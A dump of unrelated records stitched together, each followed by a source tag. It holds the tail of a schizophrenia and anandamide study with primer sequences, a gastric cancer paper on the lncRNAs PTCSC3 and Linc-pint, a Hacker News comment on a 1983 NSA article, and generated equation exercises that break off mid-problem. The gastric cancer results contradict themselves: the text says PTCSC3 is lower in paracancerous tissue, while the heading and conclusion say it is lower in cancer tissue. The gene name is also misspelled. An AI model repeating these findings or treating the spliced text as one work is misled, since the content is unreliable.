GTG C-3\'; CB~2~sense primer 5\'-TTT CCC ACT GAT CCC CAA TG-3\'; CB~2~antisense primer 5\'-AGT TGA TGA GGC ACA GCA TG-3\'; FAAH sense primer 5\'-GCC TGG GAA GTG AAC AAA GGG ACC-3\'; FAAH antisense primer 5\'-CCA CTA CGC TGT CGC ACT CCG CCG-3\'; β~2~-microglobulin sense primer 5\'-CCA GCA GAG AAT GGA AAG TC-3\'; β~2~-microglobulin antisense primer 5\'-GAT GCT GCT TAC ATG TCT CG-3\'.). The amplification profile consisted of an initial denaturation of 2 min at 95°C and 20--35 cycles of 30 sec at 95°C, annealing for 30 sec at 55°C (β~2~-microglobulin) or at 60°C (CB~1~, CB~2~and FAAH) and elongation for 1 min at 72°C. A final extension of 10 min was carried out at 72°C. The expected sizes of the amplicons were 338 bp for CB~1~; 329 bp for CB~2~; 202 for FAAH and 269 bp for β~2~-microglobulin. The β~2~-microglobulin house-keeping gene expression was used to evaluate variations in the quality and content of the mRNA and to monitor cDNA synthesis in the different preparations. Furthermore the PCR primers for β~2~-microglobulin and FAAH were selected on the basis of the sequence of the β~2~-microglobulin gene (NCBI accession number M17987) by including the intron 402--1017, and of the sequence of the FAAH human gene (NCBI accession number AF098012) by including the intron 497--722. In the presence of contaminant genomic DNA, the expected size of the amplicon would be 426 and 885 bp for FAAH and β~2~-microglobulin, respectively. 10--20 μl of PCR products were electrophoresed on 2% agarose gel (MS agarose, Roche) in TAE buffer at 4 V/cm for 4 h. Ethidium bromide (0.1 μg/ml) was included both in the gel and electrophoresis buffer and PCR products were detected by UV visualization and recorded by photo (Polapan 55, Polaroid). Evaluation of the relative expression levels was performed by analysing the amount of amplicon synthesized at different numbers of amplification cycles for a fixed quantity of cDNA in the assay. In order to obtain a quantitative evaluation of the relative amounts of the mRNA transcripts, the different PCR reactions were performed with a different number of cycles. Differences in band intensities obtained using a non-saturating number of cycles, in relation to the intensity of the housekeeping mRNA transcript (i.e. β~2~-microglobulin, which works as an \"internal standard\"), are highly indicative of differences in the levels of expression of the corresponding genes.
Statistical analyses
--------------------
Results of the anandamide level measurements, expressed in pmol/ml of blood and as means ± SEM, were compared by the unpaired Student\'s t test. When data from patients before and after pharmacological treatment were compared, the paired Student\'s t test was used.
Authors\' contributions
=======================
NDM, a senior psychiatrist, conceived this study, selected the patients and performed all clinical ratings, and was assisted by FD; VDM and LDP conceived and coordinated the study and took part in all biological assays; PO performed all molecular biology experiments; FF extracted the lipids from blood sample and measured the levels of anandamide by LC-MS. All authors have read and approved the manuscript.
######
Brief Psychiatric Rating (BPRS) Scale. Score for all the 18 items of the Brief Psychiatric Rating (BPRS) for each of the twelve patients with schizophrenia included in this study
**N° Patient** **1** **2** **3** **4** **5** **6** **7** **8** **9** **10** **11** **12** **13** **14** **15** **16** **17** **18**
---------------- ------- ------- ------- ------- ------- ------- ------- ------- ------- -------- -------- -------- -------- -------- -------- -------- -------- --------
1 4 3 4 2 2 6 1 1 4 3 5 5 3 3 6 4 2 1
2 3 5 6 3 3 6 1 1 4 2 6 6 3 3 5 3 2 2
3 acute 5 6 4 3 3 7 2 1 3 1 7 5 4 2 6 2 1 6
3 remission 2 2 2 1 2 1 1 1 2 1 1 1 2 1 1 2 1 1
4 2 4 3 2 2 5 2 1 2 2 6 4 2 2 5 2 1 1
5 acute 2 6 2 2 1 7 1 1 2 2 6 6 2 2 7 2 1 2
5 remission 1 2 1 1 1 1 1 1 2 1 1 1 1 1 1 1 1 1
6 acute 3 5 5 2 2 5 4 1 3 1 5 6 6 4 6 5 1 1
6 remission 2 2 3 1 1 2 2 1 2 1 2 1 2 2 1 2 1 1
7 acute 2 3 5 2 4 5 1 1 4 1 3 4 4 3 6 6 1 1
7 remission 1 2 2 1 2 1 1 1 3 1 1 1 2 1 2 2 1 1
8 acute 4 5 5 3 3 6 2 1 2 6 6 7 4 4 7 3 1 1
8 remission 3 3 1 1 3 2 1 1 3 1 1 1 2 1 1 2 1 1
9 2 4 3 2 3 5 2 1 3 3 5 5 3 3 5 3 2 1
10 2 4 4 5 2 5 1 1 3 3 5 5 3 3 5 4 1 1
11 4 4 4 4 1 5 2 1 3 3 4 5 2 3 5 4 1 1
12 1 4 4 6 1 5 1 3 1 2 4 5 1 2 6 2 2 2
Acknowledgements
================
We thank Dr Alfredo Dama, MD, for useful advice and support, S. Guardascione and G. Capuano for assistance, and S. Piantedosi for the artwork. This study was supported by grant POP 98/5.4.2 from Regione Campania to LDP.
|
{
"pile_set_name": "PubMed Central"
}
|
Introduction {#S0001}
============
Non-coding RNAs (ncRNAs) are emerging classes of non-protein coding RNA transcripts with pivotal roles in gene regulation.[@CIT0001] It has been reported that more than 98% of all human genome transcriptional output is ncRNAs and most ncRNAs are expressed in specific types of tissues and cells or under certain stress conditions or during specific developmental stages, indicating their extensive involvement in human body growth and development.[@CIT0002] Long non-coding RNAs, or lncRNAs, are a subgroup of ncRNAs longer than 200 nt.[@CIT0003] Functional characterization has revealed that lncRNAs not only participate in almost all important physiological processes, but also have critical functions in the development of diseases,[@CIT0004] such as different types of cancer.[@CIT0005],[@CIT0006] However, function of most lncRNAs is still unknown.
Gastric cancer is one of the most frequently diagnosed malignancies and is also the third leading cause of cancer-related deaths worldwide.[@CIT0007] Most gastric cancer patients at early stages can be cured by surgical operations. However, more than half of patients with advanced gastric cancer will die of carcinoma recurrence even after curative gastrectomy.[@CIT0008] Therefore, more studies are needed to further characterize the molecular alterations involved in the pathogenesis of gastric cancer.[@CIT0009],[@CIT0010] Our genome-wide transcriptome identified a large number of differentially expressed lncRNAs in gastric cancer patients (data not shown). Among those differential lncRNAs, lncRNA PTCSC3 which has been reported to be downregulated in papillary thyroid carcinoma,[@CIT0011] is also downregulated in gastric cancer and is positively correlated with lncRNA Linc-pint, a characterized tumor suppressor in lymphoblastic leukemia.[@CIT0012] Our study was therefore carried out to investigate the involvement of PTCSC3 and Linc-pint in gastric cancer and explored the possible interactions between them.
Materials and Methods {#S0002}
=====================
Research Subjects {#S0002-S2001}
-----------------
Our study included 78 patients with gastric cancer were diagnosed and treated in Fourth Hospital of Hebei Medical University from March 2010 to March 2015. Inclusion criteria: 1) gastric cancer patients who were diagnosed by pathological biopsy; 2) patients who were diagnosed for the first time and no treatment was performed; 3) patients willing to participate. Exclusion criteria: 1) patients who received treatment before admission or who were transferred from other hospitals; 2) patients who were complicated with other severe diseases, such as other types of cancer and systemic infection. The 78 patients included 43 females and 35 males, and age ranged from 29 to 66 years, with a mean age of 48.6±6.1 years. According to AJCC staging, there were 16 cases at stage I, 22 cases at stage II, 24 cases at stage III and 16 cases at stage IV. This study had been approved by Ethic Committee of Fourth Hospital of Hebei Medical University before patient admission and all participants signed informed consent.
Specimen Collections and Cell Lines {#S0002-S2002}
-----------------------------------
Biopsy was performed to collect cancer and paracancerous tissues from each patient. Tissues were stored in liquid nitrogen before use.
SNU-1 and Hs 746T human gastric cancer cell lines were used in this study to perform in vitro experiments. Cells of these two cell lines were purchased from American Type Culture Collection (ATCC, Manassas, VA, USA). ATCC-formulated RPMI-1640 Medium (ATCC) supplemented with 10% fetal bovine serum (FBS, ATCC) was used to cultivate the cells of both cell lines at 37°C in a 5% CO~2~ incubator.
Follow-Up {#S0002-S2003}
---------
All patients were followed up for 5 years after admission to record their overall conditions. Patients failed to complete follow-up and patients who died of other causes during follow-up were not included in this study.
Cell Transfections {#S0002-S2004}
------------------
PcDNA3.1 vector (Invitrogen) expressing PTCSC3 or Linc-pint was designed and constructed by Sangon (Shanghai, China). Linc-pint siRNA and negative control siRNA were also designed and synthesized by Sangon. Cells of SNU-1 and Hs 746T cell lines were cultivated overnight to each 70--80% confluence. All cell transfections were performed using Lipofectamine 2000 reagent (cat no. 11668-019; Invitrogen; Thermo Fisher Scientific, Inc., Waltham, MA, USA) with all operations performed in strict accordance with manufacturer's instructions. Doses of vectors and siRNAs were 10 and 45 nM, respectively. Un-transfected cells were control cells, and cell transfected with empty pcDNA3.1 vectors or negative control siRNAs were negative control cells. Cells were harvested at 24 h after transfection for subsequent experiments.
Total RNA Extraction and Reverse Transcription-Quantitative Polymerase Chain Reaction (RT-qPCR) {#S0002-S2005}
-----------------------------------------------------------------------------------------------
Tissues were ground in liquid nitrogen, followed by the addition of RNAzol reagent (Sigma-Aldrich, St. Louis, MO, USA) to extract total RNA. RNAzol reagent was also directly mixed with in vitro cultivated cells to extract total RNA. Total RNAs were reversely transcribed using SuperScript IV Reverse Transcriptase (Thermo Fisher Scientific, lnc.). To detect the expression of PTCSC3 and Linc-pint, PCR reaction systems were prepared using Applied Biosystems™ PowerUp™ SYBR™ Green Master Mix (Thermo Fisher Scientific, lnc.) and all PCR reactions were performed on CFX96 Touch Deep Well™ Real-Time PCR Detection System (Bio-Rad) with 18S RNA as the endogenous control. Primers of PTCSC3 and Linc-pint as well as 18S RNA were designed and synthesized by Sangon (Shanghai, China). Expression of TCSC3 and Linc-pint was normalized to 18S RNA using 2^−ΔΔCq^ method.
In vitro Cell Proliferation Assay {#S0002-S2006}
---------------------------------
Cells were harvested at 24 h after transfection and in vitro cell proliferation assay was performed using Cell Counting Kit-8 (CCK-8) kit (Sigma-Aldrich) to explore the effects of TCSC3 and Linc-pint on gastric cancer cell proliferation. Briefly, cells were mixed with ATCC-formulated RPMI-1640 Medium containing 10% FBS to make single-cell suspensions. Cell density was adjusted to 4×10^4^ cell/mL and cell suspensions were transferred to a 96-well plate with 100 μL cell suspension in each well. Cells were cultivated (37°C and 5% CO~2~) and 10 μL CCK was added into each well 24, 48, 72 and 96 hrs later. After that, cells were cultivated from additional 4 hrs and 10 μL DMSO was added. OD values at 450 nm were measured to reflect cell proliferation rates.
Flow Cytometry {#S0002-S2007}
--------------
Cells were harvested at 24 hrs after transfection and flow cytometry was performed to explore the effects of PTCSC3 and Linc-pint on gastric cancer cell stemness. Cells were harvested by trypsinization. IgG1-PE or CD133-PE antibody (130-093-193, Meltenyi Biotec, Germany) was used to incubate with cells (5×10^5^ cells per mL) at 4°C for 20 mins. After that, cells were harvested and dissolved in PBS. FACS Aria system (BD Immunocytometry Systems, San Jose, CA, USA) was then used to detect signals and data were processed using Cell Quest software (Becton Dickinson Ltd).
Statistical Analysis {#S0002-S2008}
--------------------
All experiments were performed 3 times and data were recorded as mean ± standard deviation. Comparisons of expression levels of TCSC3 and Linc-pint between cancer and paracancerous tissues were performed by paired *t* test. Correlations between expression levels of PTCSC3 and Linc-pint were analyzed by Pearson's correlation coefficient. Comparisons among multiple groups were performed by one-way ANOVA followed by Tukey's test. Based on the expression levels of PTCSC3 and Linc-pint in tumor tissues, patients were divided into high (n=36) and low (n=42) PTCSC3 level groups, as well as high (n=38) and low (n=40) Linc-pint level groups according to Youden's index. Survival curves were plotted based on Kaplan--Meier method and compared by log-rank *t* test. Differences with p\<0.05 were statistically significant.
Results {#S0003}
=======
PTCSC3 and Linc-pint Were Both Downregulated in Cancer Tissues of Gastric Cancer Patients {#S0003-S2001}
-----------------------------------------------------------------------------------------
RT-qPCR was performed to detect the expression of PTCSC3 and Linc-pint in both cancer and paracancerous tissues of 78 gastric cancer patients. Compared with cancer tissues, expression levels of PTCSC3 were significantly lower in paracancerous tissues ([Figure 1A](#F0001){ref-type="fig"}, p\<0.05). In addition, Linc-pint was also downregulated in cancer tissues than in paracancerous tissues ([Figure 1B](#F0001){ref-type="fig"}, p\<0.05).Figure 1PTCSC3 and Linc-pint were both downregulated in cancer tissues of gastric cancer patients. RT-qPCR results showed that PTCSC3 (**A**) and Linc-pint (**B**) were both downregulated in cancer tissues of gastric cancer patients compared with paracancerous tissues (\*p\<0.05).
Low Levels of PTCSC3 and Linc-pint in Cancer Tissue Indicate Poor Survival {#S0003-S2002}
--------------------------------------------------------------------------
Based on the expression levels of PTCSC3 and Linc-pint in tumor tissues, patients were divided into high (n=36) and low (n=42) PTCSC3 level groups, as well as high (n=38) and low (n=40) Linc-pint level groups according to Youden's index. Survival curves were plotted based on Kaplan--Meier method and compared by log-rank *t* test. As shown in [Figure 2A](#F0002){ref-type="fig"}, patients in low-level PTCSC3 group showed significantly lower overall survival rate compared with patients in high PTCSC3 group ([Figure 2A](#F0002){ref-type="fig"}). In addition, the overall survival rate of patients in low Linc-pint level group was also significantly lower than that of patients in high Linc-pint level group ([Figure 2B](#F0002){ref-type="fig"}).Figure 2Low levels of PTCSC3 and Linc-pint in cancer tissue indicate poor survival. Survival curve analysis on 5-year follow-up data showed that low levels of PTCSC3 (**A**) and Linc-pint (**B**) in cancer tissue indicate poor survival.
Expression Levels of PTCSC3 and Linc-pint Were Significantly Correlated in Cancer Tissues {#S0003-S2003}
-----------------------------------------------------------------------------------------
Correlations between expression levels of PTCSC3 and Linc-pint were analyzed by Pearson's correlation coefficient. It was observed that expression levels of PTCSC3 and Linc-pint were significantly and positively correlated in cancer tissues ([Figure 3A](#F0003){ref-type="fig"}). In contrast, the correlation between expression levels of PTCSC3 and Linc-pint was not significant in paracancerous tissues ([Figure 3B](#F0003){ref-type="fig"}).Figure 3Expression levels of PTCSC3 and Linc-pint were significantly correlated in cancer tissues. Pearson's correlation coefficient analysis showed that expression levels of PTCSC3 and Linc-pint were significantly correlated in cancer tissues (**A**) but not in paracancerous tissues (**B**).
PTCSC3 and Linc-pint Upregulated Each Other in Gastric Cancer Cells {#S0003-S2004}
-------------------------------------------------------------------
PTCSC3 and Linc-pint were overexpressed in cells of both SNU-1 and Hs 746T cell line to further investigate the interactions between PTCSC3 and Linc-pint ([Figure 4A](#F0004){ref-type="fig"}, p\<0.05). Compared with control (C) and negative control (NC), overexpression of PTCSC3 led to significantly upregulated Linc-pint expression in cells of both cell lines ([Figure 4B](#F0004){ref-type="fig"}, p\<0.05). In addition, overexpression of Linc-pint also mediated the upregulation of PTCSC3 in those cells ([Figure 4C](#F0004){ref-type="fig"}, p\<0.05).Figure 4PTCSC3 and Linc-pint upregulated each other in gastric cancer cells. Overexpression of PTCSC3 and Linc-pint was reached in cells of both SNU-1 and Hs 746T cell line at 24 h after transfection (**A**). Overexpression of PTCSC3 led to significantly upregulated Linc-pint expression in cells of both cell lines (**B**). In addition, overexpression of Linc-pint also mediated the upregulation of PTCSC3 in those cells (C) (\*p\<0.05).
PTCSC3 and Linc-pint Regulated Gastric Cancer Cell Proliferation and Stemness {#S0003-S2005}
-----------------------------------------------------------------------------
Compared with control (C) and negative control (NC), overexpression of PTCSC3 and Linc-pint led to significantly inhibited proliferation ([Figure 5A](#F0005){ref-type="fig"}) and decreased percentage of CD133+ cells ([Figure 5B](#F0005){ref-type="fig"}) (p\<0.05). Linc-pint siRNA played an opposite role and attenuated the effects of PTCSC3 overexpression on cancer cell proliferation and stemness (p\<0.05).Figure 5PTCSC3 and Linc-pint regulated gastric cancer cell proliferation and stemness. Overexpression of PTCSC3 and Linc-pint led to significantly inhibited proliferation (**A**) and decreased percentage of CD133+ cells (**B**). Linc-pint siRNA played an opposite role and attenuated the effects of PTCSC3 overexpression on cancer cell proliferation and stemness (\*p\<0.05).
Discussion {#S0004}
==========
LncRNAs are critical determinants in cancer biology, while function of most lncRNAs remains unknown. The key finding of the present study is that PTCSC3 and Linc-pint two lncRNAs play a role in tumor suppressor in gastric cancer by forming a positive feedback regulation circle.
Survival of advanced gastric cancer patients is still poor.[@CIT0013] Therefore, development of novel prognostic markers is always needed to design individualized post-surgery treatment and care strategies. Some prognostic markers, such as ImmunoScore signature,[@CIT0014] have shown potentials of clinical application. Our studies identified PTCSC3 and Linc-pint as two promising prognostic biomarkers for gastric cancer. RNA expression detection as an easy disease prediction approach may be superior to most other approaches in terms of the input of time and cost. However, more clinical studies are needed to further verify the clinical values of these two lncRNAs.
LncRNAs regulate gene expression at different levels, such as methylation and posttranscriptional and translational regulation.[@CIT0015],[@CIT0016] However, interactions between different lncRNAs are largely unknown. In the present study, we proved that PTCSC3 and Linc-pint may form a positive feedback regulation circle in gastric cancer, and this positive feedback regulation is involved in the regulation of gastric cancer cell proliferation and stemness. Interestingly, no significant correlation between expression levels of PTCSC3 and Linc-pint was observed in paracancerous tissue. Therefore, certain pathological factors may be involved to mediate the feedback regulation between PTCSC3 and Linc-pint.
It is also worth noting that Linc-pint silencing only partially attenuated the inhibitory effects of PTCSC3 overexpression on cancer cell proliferation and stemness. Therefore, PTCSC3 may interact with multiple factors to participate in the pathogenesis of gastric cancer. Instead of the interaction between two lncRNAs, PTCSC3 is more likely a component of regulation network. More studies are needed to further characterize this network. In this study, we only used CD133+ marker to analyze cancer cell stemness. Our future studies will try to include more stemness markers to further verify our conclusions.
Conclusion {#S0005}
==========
In conclusion, PTCSC3 and Linc-pint are downregulated in gastric cancer. PTCSC3 and Linc-pint may inhibit gastric cancer by forming a positive feedback regulation circle to inhibit cancer cell proliferation and reduce cell stemness.
Data Sharing Statement {#S0006}
======================
The analyzed data sets generated during the study are available from the corresponding author on reasonable request.
Ethics Approval and Consent to Participate {#S0007}
==========================================
The present study was approved by the Ethics Committee of Fourth Hospital of Hebei Medical University. The research has been carried out in accordance with the World Medical Association Declaration of Helsinki. All patients provided written informed consent prior to their inclusion within the study.
Author Contributions {#S0008}
====================
All authors contributed to data analysis, drafting and revising the article, gave final approval of the version to be published, and agree to be accountable for all aspects of the work.
Disclosure {#S0009}
==========
The authors report no conflicts of interest in this work.
|
{
"pile_set_name": "PubMed Central"
}
|
The Silent Power of the NSA (1983) - shalmanese
http://www.nytimes.com/1983/03/27/magazine/the-silent-power-of-the-nsa.html?pagewanted=all
======
stevewillows
The last paragraph tells the tale of why this article has emerged again.
"No laws define the limits of the N.S.A.'s power. No Congressional committee
subjects the agency's budget to a systematic, informed and skeptical review.
With unknown billions of Federal dollars, the agency purchases the most
sophisticated communications and computer equipment in the world. But truly to
comprehend the growing reach of this formidable organization, it is necessary
to recall once again how the computers that power the N.S.A. are also
gradually changing lives of Americans - the way they bank, obtain benefits
from the Government and communicate with family and friends. Every day, in
almost every area of culture and commerce, systems and procedures are being
adopted by private companies and organizations as well as by the nation's
security leaders that make it easier for the N.S.A. to dominate American
society should it ever decide such action is necessary."
|
{
"pile_set_name": "HackerNews"
}
|
**2 - i*t**2 + 0. Let m be g(12). Solve -m*s = -2*h + 3*h - 1, 11 = s + 4*h for s.
-1
Let x be 0*(24/9 + (-45)/15). Solve x = -f + 3*o - 20, -3*o + 6*o - 10 = -f for f.
-5
Suppose 4*x - 2*p - p - 17 = 0, 3*x - 9 = p. Solve -x*z + 23 = -5*y + 3, 3*y + 4*z + 12 = 0 for y.
-4
Let x(b) = -b + 11. Let s be x(11). Solve 8*u - 3*u = -20, s = -3*h - 4*u - 1 for h.
5
Suppose 4*x = 5*l - 25, 65*l - 67*l - 13 = 3*x. Solve a = -4*f + 7, l = -2*a + f - 3 for a.
-1
Let v be (-10)/(-40) + 22/8. Let y be 35/(-14)*2*1. Let b be (-4 + 1 - y)/1. Solve -5*c - 7 = v*l, 2*c - b*l - 11 = -c for c.
1
Let u be 0/((1 + 1)/(-4 - -2)). Suppose 5*g + 3*s = 20 + 14, 2*s + 4 = 0. Let m be u + 3 - g/(-4). Solve -3*k + m = 4*h, 4*k = -5*h + 5 - 0 for k.
-5
Suppose -15 = -3*j - 2*j. Solve 5*a = 5*t + 5, -2*a + 7*t = j*t - 4 for a.
0
Let t(b) = 16*b**2. Let h be t(1). Suppose 3*q + h = 5*q. Suppose 5*r - 8 = -2*c, -2*r + 5*c + q + 1 = 0. Solve -4*a + 24 = -3*a - 5*o, -r*o = 10 for a.
-1
Suppose 13 = 4*t + 9. Solve 3*m = -2*m - 5*b - 5, -m - 3*b - t = 0 for m.
-1
Let l(v) = -2*v**2 - 9*v - 8. Suppose -k + 5*r = 0, -2*k + 5*r - 7 = -2. Let z be l(k). Let f = -13 - z. Solve 2*o - 9 = -3*x - f*o, 0 = -3*x + 3*o + 9 for x.
3
Let q(i) = -2*i**3 + 28*i**2 - 26*i + 8. Let o be q(13). Solve -3*g - o + 0 = 4*n, 0 = -3*n - 3*g - 3 for n.
-5
Let b(h) = h + 26. Let x be b(-17). Suppose -2*g - 5 = -x. Solve 0 = 5*o - 4*s - 4, -g*o + s - 5 = 6*s for o.
0
Let q = -1377 - -1383. Solve -q*s - 20 = -s - 3*o, s - 14 = -3*o for s.
-1
Suppose 4*r - 17 = -5*x - 33, 3*x - r - 4 = 0. Solve x = 2*u - m + 1, -5*u + 2 + 3 = 5*m for u.
0
Let y = -30 + 54. Suppose -y = -7*n + 4. Solve -n*b - 5*h = 11, -5*b + h - 19 = 2*h for b.
-4
Suppose -35*z = -9*z - 52. Solve 3*f - z = -4*q - 21, 4*q = f + 1 for q.
-1
Suppose 6*c - 19 = 29. Suppose c = 3*t - 1. Solve 0*i - 4 = 4*i - t*k, -i - 4*k = 1 for i.
-1
Let y(l) = -2*l**3 + 3*l**2 + 2*l - 3 + 0 + l**3. Let x = 135 + -133. Let m be y(x). Solve 20 = m*u, 0 = j - 5*j + 2*u - 24 for j.
-4
Let d be 0*5/15 + 5. Let f be (-1 - -4 - -1)*d. Solve -i = -4*b - f, b - 2*i + 0 + 12 = 0 for b.
-4
Let c = 7 - 28. Let u = c - -65. Suppose 5*g - 16 = l - u, 2*g = 2*l - 16. Solve -w - 15 = 3*b, 2*w + 3*b = l*w - 15 for w.
0
Suppose 3*j + 2*j = 15. Suppose 0 = -2*h + h - j*l - 7, -4*h = 5*l + 14. Let b be 1/h*1 + 22. Solve 5*g = g + 5*d - b, -5*d = 3*g + 7 for g.
-4
Let w = -160 - -163. Solve 4*x = -w*j + 2*x, 2*j - 2*x = -10 for j.
-2
Let f be 12 + (-9)/((-27)/(-12)). Let o be 0 + (1 - 3*3). Let h be f - (-1 + o/(-2)). Solve 6 = -4*w + 4*x + x, -h*w - x + 7 = 0 for w.
1
Suppose -11*s - 3*a + 21 = -8*s, 2 = -4*s + 2*a. Solve -p = 2*n - 5, s*p - 25 = -5*n - 3*p for n.
0
Suppose 0 = -3*f + 61 - 55. Solve 0*v + 4*x - 22 = -v, f*v - 14 = -2*x for v.
2
Let v = -19 + 21. Solve -5*k = 4*z - 4, -4*z - v + 6 = 4*k for k.
0
Let c(g) = -g + 1. Let d be c(1). Suppose -i - 3 = -4*j + 2, d = -3*j + 12. Solve -4*p + 0*p = -5*s + 6, -5*p = 3*s - i for p.
1
Suppose -2*s + 6 = 0, 2*s + 24 = 3*u + 7*s. Solve -20 = 4*v + u*r, 3*v + 5 + 10 = r for v.
-5
Let n be (42/15)/(-7) - (-358)/(-5). Let u = -69 - n. Solve -2*l - 5 = 3*y, u*y - y = -l - 5 for y.
-5
Let t(x) = -x**2 + 10*x + 20. Let q be t(12). Let l = 7 + q. Solve 4 = z + l*b, 5*z + b = 5*b + 20 for z.
4
Let a(b) = -b**2 + 8*b + 88. Let t be a(14). Solve 0 = -j - f, -5*j + t = -3*j + 4*f for j.
-2
Suppose -2*y = -1 - 1. Let d = 3 - 11. Let p be (2/2)/((-4)/d). Solve 5*g = -t + 18, -p*g - 8 = -5*t + y for t.
3
Let m = -786 + 788. Solve 2*u = -2*y - 8, -m*y + 3 = -3*u + 1 for u.
-2
Suppose -37*p + 28*p + 45 = 0. Solve p*i = -10, i - 7 = 5*j + 1 for j.
-2
Let u(w) = w**2 + 3*w + 2. Let z be u(-1). Suppose 5*f + i - 15 = z, -2*f = -i - 3*i - 6. Solve 3*t = -0*m - m + 2, -4*t - 4 = f*m for m.
-4
Suppose y = 4*g + 3*y - 2, 4*y + 4 = -4*g. Solve -3*h + 1 = 2*b + 5, g*h = -5*b + 1 for b.
1
Let q be (-27)/6*(-4)/6. Suppose -4*b + 13 + 9 = 2*p, 5*p - 4*b = 83. Suppose 0 = -25*r + 20*r + p. Solve -r*s + 7 = -2*d, q*d = 2*d - 2*s for d.
-2
Let z(d) = 4*d - 15. Let c be z(5). Let k be (-5 + c/1)/(-1). Solve -12 = 2*r + 2*r - 4*q, -4*q = k for r.
-3
Suppose 0 = -3*y + 5*y - 12. Let w = -3 - y. Let c be 18/12 + w/(-2). Solve z + c = o, -o - z = -5*z - 21 for o.
1
Suppose 0 = 2*k + 3*f + 7, 5*f + 2 + 35 = 3*k. Solve 2*o - 3*j - 7 = 0, k*o - 2 + 13 = j for o.
-4
Let j(c) = -c + 18. Let l be j(6). Suppose -2*i = i - l, -i + 18 = 2*z. Solve -3*k + 4*u + 6 = 0, 2*k - 2*u = -z*u + 4 for k.
2
Let x be (-1)/(-4) + 10*15/(-24). Let d(r) = r**2 - r + 1. Let s(n) = -5*n + 13. Let p(u) = d(u) - s(u). Let t be p(x). Solve 2*h + 2*y = t, 0 = -y + 2 for h.
-2
Let j be (-2 - -9)*((-228)/42 - -6). Solve 3*a + j = 5*d, 4*a - 5 = -2*d + 7 for d.
2
Suppose -35*z = -31*z - 12. Let r = 40 - 31. Solve -2*g - i = -r, 5*i = -4*g + z*g for g.
5
Suppose 33*f - 12 - 87 = 0. Solve -3*b = -2*u - 15, f*u + 21 = -0*u + 4*b for u.
-3
Suppose -5*q + 3*m + 6 = 0, 25*q - 20*q = -4*m + 27. Let f = 30 + -22. Solve -q*c = a - f, -5*c + 0*a = -a for c.
1
Suppose 0 + 0 = 10*m. Let l(z) = 3 + 2*z + 0*z - z. Let u be l(m). Solve -u*g - 2*g + 15 = -5*h, 4*g = 3*h + 9 for h.
-3
Let m(c) = 5*c**2 + 3. Let s be m(2). Solve 5*n = r - s, -2*n - 2*n - 28 = -4*r for n.
-4
Let d(n) = 1. Let c(w) = -w**2 + 8*w + 14. Let v(q) = c(q) - 2*d(q). Let r be v(9). Solve -3*j + 20 = -7*j, -r*h = j + 2 for h.
1
Suppose -222 = -0*o - 6*o. Let h(a) = -a**2 + 12*a - 19. Let c be h(13). Let s = o + c. Solve -i - 8 = 3*r, 2*i - s*r = 4*i + 15 for i.
-5
Let w(p) = p + 11. Let h be w(-9). Suppose 6*l = h + 64. Let d = 16 - l. Solve d*z - 25 = 0, 5*z = 5*t - 0*t + 30 for t.
-1
Let t(a) = -14*a + 58. Let q be t(4). Solve q*m = 3*h - 4 - 9, -4*h + 6 = 3*m for h.
3
Let l = 9 - 10. Let j be l/(((-4)/20)/(-1)). Let h = j + 6. Solve -3*z - 5*r + h = 3, 0 = 5*z + 3*r + 14 for z.
-4
Suppose -57*w - 4*g - 16 = -59*w, -4*g - 10 = w. Solve -23 + 6 = w*n + 3*b, -b = -5*n - 17 for n.
-4
Suppose -9*f = -5*f - 20. Suppose f*m + 3 = 118. Let d = m + -19. Solve -4 = p - 5*p + d*v, p + 3*v = 5 for p.
2
Let l(z) = 6*z**2 + 2*z - 3. Let d be l(1). Solve 0 = 5*w + 10, -11 = d*j - 0*w + 3*w for j.
-1
Let j = 299 - 288. Solve -3*f = 2*f + 3*q - 37, -3*f + q + j = 0 for f.
5
Suppose -3*n + 5*x + 27 = 0, n - x = 2*x + 9. Let v = 12 - n. Solve 3*z = 2*k - v, -3*k + 2*z = 4*z + 15 for k.
-3
Let f(n) be the second derivative of n**3/6 - 5*n**2/2 + 4*n. Let k be f(7). Let m be (-4 + 16 + -4)/k. Solve m*i + 2*q = 18, 25 = -i + 6*i + 3*q for i.
2
Let d(q) = -q**2 - 15*q + 233. Let z be d(9). Solve 4*w + 26 = -4*b + 6*b, -3*w + b = z for w.
-4
Let a(m) = -m**2 + 2*m + 9. Let h be a(9). Let l be (-29)/9 - 12/h. Let q = l - -7. Solve q*g + 4 = -z, 2*z + 7 = 3*g + 21 for z.
4
Let m(d) = -d**2 + 5*d. Let k be m(4). Suppose 4*i - 30 = -2*v, k*i + i = 2*v + 15. Let h = v - 1. Solve 0 = j + 3*s - 2, -3*j - 4*s + 7 = -h for j.
5
Suppose 0 = d + q, -3*q - 5 = -2*d + 15. Suppose -2*u = -u - d. Suppose 4*z = -0*z + 8. Solve -3*v = b + u, v - 6 = z*v + 5*b for v.
-1
Let q(c) = -c**2 + 21*c + 52. Let a be q(23). Solve 0 = 4*u + 2 + a, -5*u = 2*t + 18 for t.
-4
Suppose 5*l + 40 = 4*u + l, -4*l = 0. Let d(z) = z**2 - 10*z + 3. Let c be d(u). Solve 0 = -2*r - 5*x - 4 - c, -2*r = -x + 1 for r.
-1
Suppose -297*a - 9 = -4*k - 302*a, -k + 2*a = -12. Solve -4*d + 22 = -4*z - k*d, -4*z - 5*d = 25 for z.
-5
Suppose 54*w + 15 = 51*w. Let t(g) = 15*g + 45. Let f(o) = -7*o - 22. Let v(h) = 5*f(h) + 2*t(h). Let y be v(w). Solve -11 = x + 2*d, d = -y*x - 4*d - 35 for x.
-3
Let r(x) = x**3 - 10*x**2 - 6*x - 40. Let h be r(11). Solve 0 = -3*b, -3*b = -3*g - 6*b + h for g.
5
Suppose -2*j = 9 - 1. Let u be (-1 - -19)/((-6)/j). Let v be (8/(-10))/(2/(-5)). Solve -3*h + 4*f = -14, u = -0*h - h - v*f for h.
-2
Let l be (-2)/(-12) + (-290)/(-60) + -5. Solve l = -3*r - 2*r - 5*n + 20, 0 = 2*r + 4*n - 8 for r.
4
Let j(d) = d**2 + 1. Let q be j(-1). Suppose -s = q*s + u - 24, -40 = -5*s - 4*u. Suppose -5*r - 15 = -s*r. Solve 4*f - 19 = -r*z, 2*z - 4*f + 2 - 4 = 0 for z.
3
Suppose -4 = 10*l - 4. Suppose -7*s + l*s = 0. Solve s = -5*w + 10, 6 = -3*b + w + 1 for b.
-1
Suppose -364*r = -350*r - 112. Solve -r*f + 9*f + 1 = q, 0 = 5*q - 5 for f.
0
Let m(b) = b**3 + 1 - b - 5*b - 4*b**2 + 9 - 1. Let q
|
{
"pile_set_name": "DM Mathematics"
}
|
Memoirs of Modern Love: Curious Age
